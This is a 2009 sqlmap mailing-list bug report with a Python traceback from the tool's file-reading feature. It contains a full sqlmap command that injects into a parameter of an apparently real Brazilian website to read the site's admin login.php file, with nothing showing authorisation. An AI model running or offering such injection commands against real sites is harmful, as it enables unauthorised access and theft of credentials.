[sqlmap-users] bug
Brought to you by:
inquisb
From: Gabriel eu <mes...@gm...> - 2009-05-14 13:13:37
|
cmd: ./sqlmap.py -u " http://www.amazontech2008.com.br/espanhol/index.php?conteudo=integra&numero=97&titulo=Uma%20refdorma%20atrasada" -p numero --union-use --read-file '/home/amazonte/public_html/admin/login.php sqlmap version: 0.7rc1 Python version: 2.5 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 81, in main start() File "/home/gabriel/exploits/sql_injection/sqlmap-0.7rc1/lib/controller/controller.py", line 265, in start action() File "/home/gabriel/exploits/sql_injection/sqlmap-0.7rc1/lib/controller/action.py", line 130, in action dumper.string("%s file saved to" % conf.rFile, conf.dbmsHandler.readFile(conf.rFile), sort=False) File "/home/gabriel/exploits/sql_injection/sqlmap-0.7rc1/plugins/generic/filesystem.py", line 304, in readFile fileContent = self.__unhexString(fileContent) File "/home/gabriel/exploits/sql_injection/sqlmap-0.7rc1/plugins/generic/filesystem.py", line 77, in __unhexString unhexStr = binascii.unhexlify(hexStr) TypeError: Odd-length string |